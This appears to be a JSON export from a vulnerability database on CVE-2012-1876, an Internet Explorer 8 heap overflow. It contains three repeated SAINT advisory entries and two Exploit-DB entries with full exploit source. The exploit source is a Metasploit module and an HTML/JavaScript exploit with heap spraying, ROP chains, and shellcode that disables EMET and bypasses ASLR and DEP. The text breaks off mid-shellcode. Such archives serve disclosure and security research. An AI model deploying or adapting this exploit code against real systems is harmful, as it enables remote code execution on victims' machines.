"description": "Added: 08/06/2012 \nCVE: [CVE-2012-1876](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-1876>) \nBID: [53848](<http://www.securityfocus.com/bid/53848>) \nOSVDB: [82866](<http://www.osvdb.org/82866>) \n\n\n### Background\n\n[Internet Explorer](<http://www.microsoft.com/windows/ie>) is an HTML web browser which comes by default on Microsoft operating systems. \n\n### Problem\n\nInternet Explorer allows websites to utilize Javascript to create dynamic web content. As such, websites can include scripts that modify the website at run-time. The browser needs to manage the modifications of objects that are altered at run-time. Internet Explorer does not properly handle memory allocations when a modification to the SPAN attribute of table COL field is made, where the table table-layout style is set to 'fixed'. This can result in an exploitable heap overflow condition. \n\n### Resolution\n\nApply the patch referenced in [Microsoft Security Bulletin 12-037](<http://www.microsoft.com/technet/security/Bulletin/MS12-037.mspx>). \n\n### References\n\n<http://www.zerodayinitiative.com/advisories/ZDI-12-093/> \n<http://www.microsoft.com/technet/security/bulletin/MS12-037.mspx> \n<http://support.microsoft.com/default.aspx?scid=kb;EN-US;2699988> \n\n\n### Limitations\n\nThis exploit has been tested against Microsoft Internet Explorer 8 with KB2675157 on Windows XP SP3 English (DEP OptIn) and Windows 7 SP1 (DEP OptIn). \n\n### Platforms\n\nWindows \n \n\n", "edition": 4, "modified": "2012-08-06T00:00:00", "published": "2012-08-06T00:00:00", "id": "SAINT:E0DB2F32D06502F92B8144DCC51213D4", "href": "https://my.saintcorporation.com/cgi-bin/exploit_info/ie_col_span_heap_overflow", "title": "Internet Explorer COL SPAN Heap Overflow", "type": "saint", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T19:19:28", "bulletinFamily": "exploit", "cvelist": ["CVE-2012-1876"], "edition": 2, "description": "Added: 08/06/2012 \nCVE: [CVE-2012-1876](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-1876>) \nBID: [53848](<http://www.securityfocus.com/bid/53848>) \nOSVDB: [82866](<http://www.osvdb.org/82866>) \n\n\n### Background\n\n[Internet Explorer](<http://www.microsoft.com/windows/ie>) is an HTML web browser which comes by default on Microsoft operating systems. \n\n### Problem\n\nInternet Explorer allows websites to utilize Javascript to create dynamic web content. As such, websites can include scripts that modify the website at run-time. The browser needs to manage the modifications of objects that are altered at run-time. Internet Explorer does not properly handle memory allocations when a modification to the SPAN attribute of table COL field is made, where the table table-layout style is set to 'fixed'. This can result in an exploitable heap overflow condition. \n\n### Resolution\n\nApply the patch referenced in [Microsoft Security Bulletin 12-037](<http://www.microsoft.com/technet/security/Bulletin/MS12-037.mspx>). \n\n### References\n\n<http://www.zerodayinitiative.com/advisories/ZDI-12-093/> \n<http://www.microsoft.com/technet/security/bulletin/MS12-037.mspx> \n<http://support.microsoft.com/default.aspx?scid=kb;EN-US;2699988> \n\n\n### Limitations\n\nThis exploit has been tested against Microsoft Internet Explorer 8 with KB2675157 on Windows XP SP3 English (DEP OptIn) and Windows 7 SP1 (DEP OptIn). \n\n### Platforms\n\nWindows \n \n\n", "modified": "2012-08-06T00:00:00", "published": "2012-08-06T00:00:00", "href": "http://download.saintcorporation.com/cgi-bin/exploit_info/ie_col_span_heap_overflow", "id": "SAINT:625E0D0980997F6BFF377B9847205303", "type": "saint", "title": "Internet Explorer COL SPAN Heap Overflow", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2016-10-03T15:01:55", "bulletinFamily": "exploit", "cvelist": ["CVE-2012-1876"], "description": "Added: 08/06/2012 \nCVE: [CVE-2012-1876](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-1876>) \nBID: [53848](<http://www.securityfocus.com/bid/53848>) \nOSVDB: [82866](<http://www.osvdb.org/82866>) \n\n\n### Background\n\n[Internet Explorer](<http://www.microsoft.com/windows/ie>) is an HTML web browser which comes by default on Microsoft operating systems. \n\n### Problem\n\nInternet Explorer allows websites to utilize Javascript to create dynamic web content. As such, websites can include scripts that modify the website at run-time. The browser needs to manage the modifications of objects that are altered at run-time. Internet Explorer does not properly handle memory allocations when a modification to the SPAN attribute of table COL field is made, where the table table-layout style is set to 'fixed'. This can result in an exploitable heap overflow condition. \n\n### Resolution\n\nApply the patch referenced in [Microsoft Security Bulletin 12-037](<http://www.microsoft.com/technet/security/Bulletin/MS12-037.mspx>). \n\n### References\n\n<http://www.zerodayinitiative.com/advisories/ZDI-12-093/> \n<http://www.microsoft.com/technet/security/bulletin/MS12-037.mspx> \n<http://support.microsoft.com/default.aspx?scid=kb;EN-US;2699988> \n\n\n### Limitations\n\nThis exploit has been tested against Microsoft Internet Explorer 8 with KB2675157 on Windows XP SP3 English (DEP OptIn) and Windows 7 SP1 (DEP OptIn). \n\n### Platforms\n\nWindows \n \n\n", "edition": 1, "modified": "2012-08-06T00:00:00", "published": "2012-08-06T00:00:00", "id": "SAINT:26F60ECC90154B838B0AF4C895DDCD0E", "href": "http://www.saintcorporation.com/cgi-bin/exploit_info/ie_col_span_heap_overflow", "type": "saint", "title": "Internet Explorer COL SPAN Heap Overflow", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "exploitdb": [{"lastseen": "2016-02-02T13:38:25", "description": "Microsoft Internet Explorer Fixed Table Col Span Heap Overflow. CVE-2012-1876. Remote exploit for windows platform", "published": "2012-08-02T00:00:00", "type": "exploitdb", "title": "Microsoft Internet Explorer Fixed Table Col Span Heap Overflow", "bulletinFamily": "exploit", "cvelist": ["CVE-2012-1876"], "modified": "2012-08-02T00:00:00", "id": "EDB-ID:20174", "href": "https://www.exploit-db.com/exploits/20174/", "sourceData": "##\r\n# This file is part of the Metasploit Framework and may be subject to\r\n# redistribution and commercial restrictions. Please see the Metasploit\r\n# web site for more information on licensing and terms of use.\r\n# http://metasploit.com/\r\n##\r\n\r\nrequire 'msf/core'\r\n\r\nclass Metasploit3 < Msf::Exploit::Remote\r\n\tRank = NormalRanking\r\n\r\n\tinclude Msf::Exploit::Remote::HttpServer::HTML\r\n\tinclude Msf::Exploit::Remote::BrowserAutopwn\r\n\tautopwn_info({\r\n\t\t:os_name => OperatingSystems::WINDOWS,\r\n\t\t:ua_minver => \"8.0\",\r\n\t\t:ua_maxver => \"8.0\",\r\n\t\t:rank => NormalRanking, # reliable memory corruption\r\n\t\t:javascript => true\r\n\t})\r\n\r\n\tdef initialize(info = {})\r\n\t\tsuper(update_info(info,\r\n\t\t\t'Name' => 'Microsoft Internet Explorer Fixed Table Col Span Heap Overflow',\r\n\t\t\t'Description' => %q{\r\n\t\t\t\t\tThis module exploits a heap overflow vulnerability in Internet Explorer caused\r\n\t\t\t\tby an incorrect handling of the span attribute for col elements from a fixed table,\r\n\t\t\t\twhen they are modified dynamically by javascript code.\r\n\t\t\t},\r\n\t\t\t'License' => MSF_LICENSE,\r\n\t\t\t'Author' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t'Alexandre Pelletier', # Vulnerability analysis\r\n\t\t\t\t\t'mr_me <steventhomasseeley[at]gmail.com>', # Metasploit module\r\n\t\t\t\t\t'binjo', # Metasploit module\r\n\t\t\t\t\t'sinn3r', # Help with the Metasploit module\r\n\t\t\t\t\t'juan' # Help with the Metasploit module\r\n\t\t\t\t],\r\n\t\t\t'References' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t[ 'CVE', '2012-1876' ],\r\n\t\t\t\t\t[ 'OSVDB', '82866'],\r\n\t\t\t\t\t[ 'BID', '53848' ],\r\n\t\t\t\t\t[ 'MSB', 'MS12-037' ],\r\n\t\t\t\t\t[ 'URL', 'http://www.vupen.com/blog/20120710.Advanced_Exploitation_of_Internet_Explorer_HeapOv_CVE-2012-1876.php' ]\r\n\t\t\t\t],\r\n\t\t\t'DefaultOptions' =>\r\n\t\t\t\t{\r\n\t\t\t\t\t'EXITFUNC' => 'process',\r\n\t\t\t\t\t'InitialAutoRunScript' => 'migrate -f'\r\n\t\t\t\t},\r\n\t\t\t'Payload' =>\r\n\t\t\t\t{\r\n\t\t\t\t\t'Space' => 1024,\r\n\t\t\t\t\t'BadChars' => \"\\x00\",\r\n\t\t\t\t},\r\n\t\t\t'Platform' => 'win',\r\n\t\t\t'Targets' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t[ 'Automatic', {} ],\r\n\t\t\t\t\t[ 'IE 8 on Windows XP SP3 with msvcrt ROP',\r\n\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t'Rop' => :msvcrt\r\n\t\t\t\t\t\t}\r\n\t\t\t\t\t],\r\n\t\t\t\t\t[ 'IE 8 on Windows 7 SP1',\r\n\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t'Rop' => :jre\r\n\t\t\t\t\t\t}\r\n\t\t\t\t\t]\r\n\t\t\t\t],\r\n\t\t\t'Privileged' => false,\r\n\t\t\t'DisclosureDate' => 'Jun 12 2012',\r\n\t\t\t'DefaultTarget' => 0))\r\n\r\n\t\t\tregister_options(\r\n\t\t\t\t[\r\n\t\t\t\t\tOptBool.new('OBFUSCATE', [false, 'Enable JavaScript obfuscation', false])\r\n\t\t\t\t], self.class)\r\n\tend\r\n\r\n\tdef get_target(agent)\r\n\t\t#If the user is already specified by the user, we'll just use that\r\n\t\treturn target if target.name != 'Automatic'\r\n\r\n\t\tif agent =~ /NT 5\\.1/ and agent =~ /MSIE 8/\r\n\t\t\treturn targets[1] #IE 8 on Windows XP SP3\r\n\t\telsif agent =~ /NT 6\\.1/ and agent =~ /MSIE 8/\r\n\t\t\treturn targets[2] #IE 8 on Windows 7 with JRE\r\n\t\telse\r\n\t\t\treturn nil\r\n\t\tend\r\n\tend\r\n\r\n\tdef junk(n=4)\r\n\t\treturn rand_text_alpha(n).unpack(\"V\").first\r\n\tend\r\n\r\n\tdef nop\r\n\t\treturn make_nops(4).unpack(\"V\").first\r\n\tend\r\n\r\n\tdef get_payload(t)\r\n\r\n\t\tcode = payload.encoded\r\n\r\n\t\t# Both ROP chains generated by mona.py - See corelan.be\r\n\t\tcase t['Rop']\r\n\t\t\twhen :msvcrt\r\n\t\t\t\tprint_status(\"Using msvcrt ROP\")\r\n\t\t\t\texec_size = code.length\r\n\t\t\t\trop =\r\n\t\t\t\t\t[\r\n\t\t\t\t\t\t0x77c4ec01, # retn\r\n\t\t\t\t\t\t0x77c4ec00, # pop ebp; retn\r\n\t\t\t\t\t\t0x77c15ed5, # xchg eax,esp; retn (pivot)\r\n\t\t\t\t\t\t0x77c4e392, # pop eax; retn\r\n\t\t\t\t\t\t0x77c11120, # <- *&VirtualProtect()\r\n\t\t\t\t\t\t0x77c2e493, # mov eax, dword ptr ds:[eax]; pop ebp; retn\r\n\t\t\t\t\t\tjunk,\r\n\t\t\t\t\t\t0x77c2dd6c,\r\n\t\t\t\t\t\t0x77c4ec00, # pop ebp; retn\r\n\t\t\t\t\t\t0x77c35459, # ptr to 'push esp; ret'\r\n\t\t\t\t\t\t0x77c47705, # pop ebx; retn\r\n\t\t\t\t\t\texec_size, # ebx\r\n\t\t\t\t\t\t0x77c3ea01, # pop ecx; retn\r\n\t\t\t\t\t\t0x77c5d000, # W pointer (lpOldProtect) (-> ecx)\r\n\t\t\t\t\t\t0x77c46100, # pop edi; retn\r\n\t\t\t\t\t\t0x77c46101, # rop nop (-> edi)\r\n\t\t\t\t\t\t0x77c4d680, # pop edx; retn\r\n\t\t\t\t\t\t0x00000040, # newProtect (0x40) (-> edx)\r\n\t\t\t\t\t\t0x77c4e392, # pop eax; retn\r\n\t\t\t\t\t\tnop, # nops (-> eax)\r\n\t\t\t\t\t\t0x77c12df9 # pushad; retn\r\n\t\t\t\t\t].pack(\"V*\")\r\n\t\t\twhen :jre\r\n\t\t\t\tprint_status(\"Using JRE ROP\")\r\n\t\t\t\texec_size = code.length\r\n\t\t\t\trop =\r\n\t\t\t\t\t[\r\n\t\t\t\t\t\t0x7c346c0b, # retn\r\n\t\t\t\t\t\t0x7c36f970, # pop ebp; retn\r\n\t\t\t\t\t\t0x7c348b05, # xchg eax,esp; retn (pivot)\r\n\t\t\t\t\t\t0x7c36f970, # pop ebp; retn [MSVCR71.dll]\r\n\t\t\t\t\t\t0x7c36f970, # skip 4 bytes [MSVCR71.dll]\r\n\t\t\t\t\t\t0x7c34373a, # pop ebx ; retn [MSVCR71.dll]\r\n\t\t\t\t\t\texec_size, # ebx\r\n\t\t\t\t\t\t0x7c3444d0, # pop edx ; retn [MSVCR71.dll]\r\n\t\t\t\t\t\t0x00000040, # 0x00000040-> edx\r\n\t\t\t\t\t\t0x7c361829, # pop ecx ; retn [MSVCR71.dll]\r\n\t\t\t\t\t\t0x7c38f036, # &Writable location [MSVCR71.dll]\r\n\t\t\t\t\t\t0x7c342766, # pop edi ; retn [MSVCR71.dll]\r\n\t\t\t\t\t\t0x7c346c0b, # retn (rop nop) [MSVCR71.dll]\r\n\t\t\t\t\t\t0x7c350564, # pop esi ; retn [MSVCR71.dll]\r\n\t\t\t\t\t\t0x7c3415a2, # jmp [eax] [MSVCR71.dll]\r\n\t\t\t\t\t\t0x7c3766ff, # pop eax ; retn [MSVCR71.dll]\r\n\t\t\t\t\t\t0x7c37a151, # ptr to &VirtualProtect() - 0x0ef [IAT msvcr71.dll]\r\n\t\t\t\t\t\t0x7c378c81, # pushad # add al,0ef ; retn [MSVCR71.dll]\r\n\t\t\t\t\t\t0x7c345c30 # ptr to 'push esp; ret ' [MSVCR71.dll]\r\n\t\t\t\t\t].pack(\"V*\")\r\n\t\tend\r\n\r\n\t\tcode = rop + code\r\n\t\treturn code\r\n\tend\r\n\r\n\tdef on_request_uri(cli, request)\r\n\r\n\t\tagent = request.headers['User-Agent']\r\n\t\tmy_target = get_target(agent)\r\n\r\n\t\t# Avoid the attack if the victim doesn't have the same setup we're targeting\r\n\t\tif my_target.nil?\r\n\t\t\tprint_error(\"Browser not supported: #{agent}\")\r\n\t\t\tsend_not_found(cli)\r\n\t\t\treturn\r\n\t\tend\r\n\r\n\t\tjs_code = Rex::Text.to_unescape(get_payload(my_target), Rex::Arch.endian(target.arch))\r\n\r\n\t\ttable_builder = ''\r\n\r\n\t\t0.upto(132) do |i|\r\n\t\t\ttable_builder << \"<table style=\\\"table-layout:fixed\\\" ><col id=\\\"#{i}\\\" width=\\\"41\\\" span=\\\"9\\\" >  </col></table>\"\r\n\t\tend\r\n\r\n\t\t# About smash_vtable():\r\n\t\t# * smash the vftable 0x07070024\r\n\t\t# * span => the amount to overwrite\r\n\t\tjs_element_id = Rex::Text.rand_text_alpha(4)\r\n\t\tspray_trigger_js = <<-JS\r\n\r\n\t\tvar dap = \"EEEE\";\r\n\t\twhile ( dap.length < 480 ) dap += dap;\r\n\r\n\t\tvar padding = \"AAAA\";\r\n\t\twhile ( padding.length < 480 ) padding += padding;\r\n\r\n\t\tvar filler = \"BBBB\";\r\n\t\twhile ( filler.length < 480 ) filler += filler;\r\n\r\n\t\tvar arr = new Array();\r\n\t\tvar rra = new Array();\r\n\r\n\t\tvar div_container = document.getElementById(\"#{js_element_id}\");\r\n\t\tdiv_container.style.cssText = \"display:none\";\r\n\r\n\t\tfor (var i=0; i < 500; i+=2) {\r\n\t\t\trra[i] = dap.substring(0, (0x100-6)/2);\r\n\t\t\tarr[i] = padding.substring(0, (0x100-6)/2);\r\n\t\t\tarr[i+1] = filler.substring(0, (0x100-6)/2);\r\n\t\t\tvar obj = document.createElement(\"button\");\r\n\t\t\tdiv_container.appendChild(obj);\r\n\t\t}\r\n\r\n\t\tfor (var i=200; i<500; i+=2 ) {\r\n\t\t\trra[i] = null;\r\n\t\t\tCollectGarbage();\r\n\t\t}\r\n\r\n\t\tfunction heap_spray(){\r\n\t\t\tCollectGarbage();\r\n\r\n\t\t\tvar shellcode = unescape(\"#{js_code}\");\r\n\r\n\t\t\twhile (shellcode.length < 100000)\r\n\t\t\tshellcode = shellcode + shellcode;\r\n\t\t\tvar onemeg = shellcode.substr(0, 64*1024/2);\r\n\t\t\tfor (i=0; i<14; i++) {\r\n\t\t\t\tonemeg += shellcode.substr(0, 64*1024/2);\r\n\t\t\t}\r\n\r\n\t\t\tonemeg += shellcode.substr(0, (64*1024/2)-(38/2));\r\n\t\t\tvar spray = new Array();\r\n\r\n\t\t\tfor (i=0; i<400; i++) {\r\n\t\t\t\tspray[i] = onemeg.substr(0, onemeg.length);\r\n\t\t\t}\r\n\t\t}\r\n\r\n\t\tfunction smash_vtable(){\r\n\t\t\tvar obj_col_0 = document.getElementById(\"132\");\r\n\t\t\tobj_col_0.width = \"1178993\";\r\n\t\t\tobj_col_0.span = \"44\";\r\n\t\t}\r\n\r\n\t\tsetTimeout(function(){heap_spray()}, 400);\r\n\t\tsetTimeout(function(){smash_vtable()}, 700);\r\n\t\tJS\r\n\r\n\t\tif datastore['OBFUSCATE']\r\n\t\t\tspray_trigger_js = ::Rex::Exploitation::JSObfu.new(spray_trigger_js)\r\n\t\t\tspray_trigger_js.obfuscate\r\n\t\tend\r\n\r\n\t\t# build html\r\n\t\tcontent = <<-HTML\r\n\t\t<html>\r\n\t\t<body>\r\n\t\t<div id=\"#{js_element_id}\"></div>\r\n\t\t#{table_builder}\r\n\t\t<script language='javascript'>\r\n\t\t#{spray_trigger_js}\r\n\t\t</script>\r\n\t\t</body>\r\n\t\t</html>\r\n\t\tHTML\r\n\r\n\t\tprint_status(\"Sending exploit to #{cli.peerhost}:#{cli.peerport}...\")\r\n\r\n\t\t# Transmit the response to the client\r\n\t\tsend_response_html(cli, content)\r\n\tend\r\n\r\nend\r\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/20174/"}, {"lastseen": "2016-02-03T20:10:28", "description": "Microsoft Internet Explorer 8 - Fixed Col Span ID Full ASLR, DEP & EMET 4.1.x Bypass (MS12-037). CVE-2012-1876. Remote exploit for windows platform", "published": "2014-07-01T00:00:00", "type": "exploitdb", "title": "Microsoft Internet Explorer 8 - Fixed Col Span ID Full ASLR, DEP & EMET 4.1.x Bypass MS12-037", "bulletinFamily": "exploit", "cvelist": ["CVE-2012-1876"], "modified": "2014-07-01T00:00:00", "id": "EDB-ID:33944", "href": "https://www.exploit-db.com/exploits/33944/", "sourceData": "<!--\r\n** Internet Explorer 8 Fixed Col Span ID full ASLR, DEP and EMET 4.1.X bypass\r\n** Offensive Security Research Team\r\n** http://www.offensive-security.com/vulndev/disarming-enhanced-mitigation-experience-toolkit-emet\r\n** Affected Software: Internet Explorer 8\r\n** Vulnerability: Fixed Col Span ID\r\n** CVE: CVE-2012-1876\r\n** Tested on Windows 7 (x86) - IE 8.0.7601.17514 & EMET 4.1.X\r\n-->\r\n\r\n<html>\r\n<body>\r\n<div id=\"evil\"></div>\r\n<table style=\"table-layout:fixed\" ><col id=\"132\" width=\"41\" span=\"9\" >\u00c2\u00a0 </col></table>\r\n<script language='javascript'>\r\n\r\nfunction strtoint(str) {\r\n return str.charCodeAt(1)*0x10000 + str.charCodeAt(0);\r\n}\r\n\r\nvar free = \"EEEE\";\r\nwhile ( free.length < 500 ) free += free;\r\n\r\nvar string1 = \"AAAA\";\r\nwhile ( string1.length < 500 ) string1 += string1;\r\n\r\nvar string2 = \"BBBB\";\r\nwhile ( string2.length < 500 ) string2 += string2;\r\n\r\nvar fr = new Array();\r\nvar al = new Array();\r\nvar bl = new Array();\r\n\r\nvar div_container = document.getElementById(\"evil\");\r\ndiv_container.style.cssText = \"display:none\";\r\n\r\nfor (var i=0; i < 500; i+=2) {\r\n fr[i] = free.substring(0, (0x100-6)/2);\r\n al[i] = string1.substring(0, (0x100-6)/2);\r\n bl[i] = string2.substring(0, (0x100-6)/2);\r\n var obj = document.createElement(\"button\");\r\n div_container.appendChild(obj);\r\n}\r\n\r\nfor (var i=200; i<500; i+=2 ) {\r\n fr[i] = null;\r\n CollectGarbage();\r\n}\r\n\r\nfunction heapspray(cbuttonlayout) {\r\n CollectGarbage();\r\n var rop = cbuttonlayout + 4161; // RET\r\n var rop = rop.toString(16);\r\n var rop1 = rop.substring(4,8);\r\n var rop2 = rop.substring(0,4); // } RET\r\n\r\n var rop = cbuttonlayout + 11360; // POP EBP\r\n var rop = rop.toString(16);\r\n var rop3 = rop.substring(4,8);\r\n var rop4 = rop.substring(0,4); // } RET\r\n\r\n var rop = cbuttonlayout + 111675; // XCHG EAX,ESP\r\n var rop = rop.toString(16);\r\n var rop5 = rop.substring(4,8);\r\n var rop6 = rop.substring(0,4); // } RET\r\n\r\n var rop = cbuttonlayout + 12377; // POP EBX\r\n var rop = rop.toString(16);\r\n var rop7 = rop.substring(4,8);\r\n var rop8 = rop.substring(0,4); // } RET\r\n\r\n var rop = cbuttonlayout + 642768; // POP EDX\r\n var rop = rop.toString(16);\r\n var rop9 = rop.substring(4,8);\r\n var rop10 = rop.substring(0,4); // } RET\r\n\r\n var rop = cbuttonlayout + 12201; // POP ECX --> Changed\r\n var rop = rop.toString(16);\r\n var rop11 = rop.substring(4,8);\r\n var rop12 = rop.substring(0,4); // } RET\r\n\r\n var rop = cbuttonlayout + 5504544; // Writable location\r\n var rop = rop.toString(16);\r\n var writable1 = rop.substring(4,8);\r\n var writable2 = rop.substring(0,4); // } RET\r\n\r\n var rop = cbuttonlayout + 12462; // POP EDI\r\n var rop = rop.toString(16);\r\n var rop13 = rop.substring(4,8);\r\n var rop14 = rop.substring(0,4); // } RET\r\n\r\n var rop = cbuttonlayout + 12043; // POP ESI --> changed\r\n var rop = rop.toString(16);\r\n var rop15 = rop.substring(4,8);\r\n var rop16 = rop.substring(0,4); // } RET\r\n\r\n var rop = cbuttonlayout + 63776; // JMP EAX\r\n var rop = rop.toString(16);\r\n var jmpeax1 = rop.substring(4,8);\r\n var jmpeax2 = rop.substring(0,4); // } RET\r\n\r\n var rop = cbuttonlayout + 85751; // POP EAX\r\n var rop = rop.toString(16);\r\n var rop17 = rop.substring(4,8);\r\n var rop18 = rop.substring(0,4); // } RET\r\n\r\n var rop = cbuttonlayout + 4936; // VirtualProtect()\r\n var rop = rop.toString(16);\r\n var vp1 = rop.substring(4,8);\r\n var vp2 = rop.substring(0,4); // } RET\r\n\r\n var rop = cbuttonlayout + 454843; // MOV EAX,DWORD PTR DS:[EAX]\r\n var rop = rop.toString(16);\r\n var rop19 = rop.substring(4,8);\r\n var rop20 = rop.substring(0,4); // } RET\r\n\r\n var rop = cbuttonlayout + 234657; // PUSHAD\r\n var rop = rop.toString(16);\r\n var rop21 = rop.substring(4,8);\r\n var rop22 = rop.substring(0,4); // } RET\r\n\r\n\r\n var rop = cbuttonlayout + 408958; // PUSH ESP\r\n var rop = rop.toString(16);\r\n var rop23 = rop.substring(4,8);\r\n var rop24 = rop.substring(0,4); // } RET\r\n\r\n var rop = cbuttonlayout + 2228408; // POP ECX\r\n var rop = rop.toString(16);\r\n var rop25 = rop.substring(4,8);\r\n var rop26 = rop.substring(0,4); // } RET\r\n\r\n var rop = cbuttonlayout + 1586172; // POP EAX\r\n var rop = rop.toString(16);\r\n var rop27 = rop.substring(4,8);\r\n var rop28 = rop.substring(0,4); // } RET\r\n\r\n var rop = cbuttonlayout + 1589179; // MOV EAX,DWORD PTR [EAX]\r\n var rop = rop.toString(16);\r\n var rop29 = rop.substring(4,8);\r\n var rop30 = rop.substring(0,4); // } RET\r\n\r\n var rop = cbuttonlayout + 1884912; // PUSH EAX\r\n var rop = rop.toString(16);\r\n var rop31 = rop.substring(4,8);\r\n var rop32 = rop.substring(0,4); // } RET\r\n\r\n var rop = cbuttonlayout + 2140694; // ADD EAX,ECX\r\n var rop = rop.toString(16);\r\n var rop33 = rop.substring(4,8);\r\n var rop34 = rop.substring(0,4); // } RET\r\n\r\n var rop = cbuttonlayout + 2364867; // MOV DWORD PTR [EAX],ECX\r\n var rop = rop.toString(16);\r\n var rop35 = rop.substring(4,8);\r\n var rop36 = rop.substring(0,4); // } RET\r\n\r\n var rop = cbuttonlayout + 5036248; // ADD ESP,0C\r\n var rop = rop.toString(16);\r\n var rop37 = rop.substring(4,8);\r\n var rop38 = rop.substring(0,4); // } RET\r\n\r\n var getmodulew = cbuttonlayout + 4840; // GetModuleHandleW\r\n var getmodulew = getmodulew.toString(16);\r\n var getmodulew1 = getmodulew.substring(4,8);\r\n var getmodulew2 = getmodulew.substring(0,4); // } RET\r\n\r\n var getprocaddr = cbuttonlayout + 4836; // GetProcAddress\r\n var getprocaddr = getprocaddr.toString(16);\r\n var getprocaddr1 = getprocaddr.substring(4,8);\r\n var getprocaddr2 = getprocaddr.substring(0,4); // } RET\r\n\r\n var shellcode = unescape(\"%u4141%u4141%u4242%u4242%u4343%u4343\"); // PADDING\r\n shellcode+= unescape(\"%u4141%u4141%u4242%u4242%u4343%u4343\"); // PADDING\r\n shellcode+= unescape(\"%u4141%u4141\"); // PADDING\r\n\r\n shellcode+= unescape(\"%u\"+rop1+\"%u\"+rop2); // RETN\r\n shellcode+= unescape(\"%u\"+rop3+\"%u\"+rop4); // POP EBP # RETN\r\n shellcode+= unescape(\"%u\"+rop5+\"%u\"+rop6); // XCHG EAX,ESP # RETN\r\n\r\n // EMET disable part 0x01\r\n // Implement the Tachyon detection grid to overcome the Romulan cloaking device.\r\n shellcode+= unescape(\"%u\"+rop27+\"%u\"+rop28); // POP EAX # RETN\r\n shellcode+= unescape(\"%u\"+getmodulew1+\"%u\"+getmodulew2); // GetModuleHandleW\r\n shellcode+= unescape(\"%u\"+rop29+\"%u\"+rop30); // MOV EAX,DWORD PTR [EAX] # RETN\r\n shellcode+= unescape(\"%u\"+rop31+\"%u\"+rop32); // PUSH EAX # RETN\r\n shellcode+= unescape(\"%u\"+rop25+\"%u\"+rop26); // POP ECX # RETN\r\n shellcode+= unescape(\"%u101C%u076d\"); // EMET string\r\n shellcode+= unescape(\"%ue220%u0007\"); // EMET offset\r\n shellcode+= unescape(\"%u\"+rop33+\"%u\"+rop34); // ADD EAX,ECX # RETN\r\n shellcode+= unescape(\"%u\"+rop25+\"%u\"+rop26); // POP ECX # RETN\r\n shellcode+= unescape(\"%u0000%u0000\"); // Zero out ECX\r\n shellcode+= unescape(\"%u\"+rop35+\"%u\"+rop36); // MOV DWORD PTR [EAX],ECX # RETN\r\n shellcode+= unescape(\"%u\"+rop37+\"%u\"+rop38); // ADD ESP,0C # RETN\r\n shellcode+= \"EMET\"; // EMET string\r\n shellcode+= unescape(\"%u0000%u0000\"); // EMET string\r\n // EMET disable part 0x01 end\r\n\r\n // Performing a standard Kumeh maneuver ... (VirtualProtect mona chain)\r\n shellcode+= unescape(\"%u\"+rop3+\"%u\"+rop4); // POP EBP\r\n shellcode+= unescape(\"%u\"+rop3+\"%u\"+rop4); // POP EBP\r\n shellcode+= unescape(\"%u\"+rop7+\"%u\"+rop8); // POP EBP\r\n shellcode+= unescape(\"%u1024%u0000\"); // Size 0x00001024\r\n shellcode+= unescape(\"%u\"+rop9+\"%u\"+rop10); // POP EDX\r\n shellcode+= unescape(\"%u0040%u0000\"); // 0x00000040\r\n shellcode+= unescape(\"%u\"+rop11+\"%u\"+rop12); // POP ECX\r\n shellcode+= unescape(\"%u\"+writable1+\"%u\"+writable2); // Writable Location\r\n shellcode+= unescape(\"%u\"+rop13+\"%u\"+rop14); // POP EDI\r\n shellcode+= unescape(\"%u\"+rop1+\"%u\"+rop2); // RET\r\n shellcode+= unescape(\"%u\"+rop15+\"%u\"+rop16); // POP ESI\r\n shellcode+= unescape(\"%u\"+jmpeax1+\"%u\"+jmpeax2); // JMP EAX\r\n shellcode+= unescape(\"%u\"+rop17+\"%u\"+rop18); // POP EAX\r\n shellcode+= unescape(\"%u\"+vp1+\"%u\"+vp2); // VirtualProtect()\r\n shellcode+= unescape(\"%u\"+rop19+\"%u\"+rop20); // MOV EAX,DWORD PTR DS:[EAX]\r\n shellcode+= unescape(\"%u\"+rop21+\"%u\"+rop22); // PUSHAD\r\n shellcode+= unescape(\"%u\"+rop23+\"%u\"+rop24); // PUSH ESP\r\n shellcode+= unescape(\"%u9090%u9090\"); // NOPs\r\n\r\n // EMET disable part 0x02\r\n // Execute the Corbomite bluff to disarm EAF\r\n shellcode+= unescape(\"%uc0b8%u6d10\");\r\n shellcode+= unescape(\"%u8b07%u8b00\");\r\n shellcode+= unescape(\"%u6800%u10c8\");\r\n shellcode+= unescape(\"%u076d%ud0ff\");\r\n shellcode+= unescape(\"%ud468%u6d10\");\r\n shellcode+= unescape(\"%u5007%uc4b8\");\r\n shellcode+= unescape(\"%u6d10%u8b07\");\r\n shellcode+= unescape(\"%u8b00%uff00\");\r\n shellcode+= unescape(\"%u8bd0%u81f0\");\r\n shellcode+= unescape(\"%uccec%u0002\");\r\n shellcode+= unescape(\"%uc700%u2404\");\r\n shellcode+= unescape(\"%u0010%u0001\");\r\n shellcode+= unescape(\"%ufc8b%uccb9\");\r\n shellcode+= unescape(\"%u0002%u8300\");\r\n shellcode+= unescape(\"%u04c7%ue983\");\r\n shellcode+= unescape(\"%u3304%uf3c0\");\r\n shellcode+= unescape(\"%u54aa%ufe6a\");\r\n shellcode+= unescape(\"%ud6ff%u9090\");\r\n shellcode+= unescape(\"%u9090%u9090\"); // NOPs\r\n shellcode+= unescape(\"%u9090%u29eb\"); // NOPs\r\n shellcode+= unescape(\"%u\"+getmodulew1+\"%u\"+getmodulew2); // GetModuleHandleW\r\n shellcode+= unescape(\"%u\"+getprocaddr1+\"%u\"+getprocaddr2); // GetProcAddress\r\n shellcode+= \"NTDLL\";\r\n shellcode+= unescape(\"%u0000\");\r\n shellcode+= 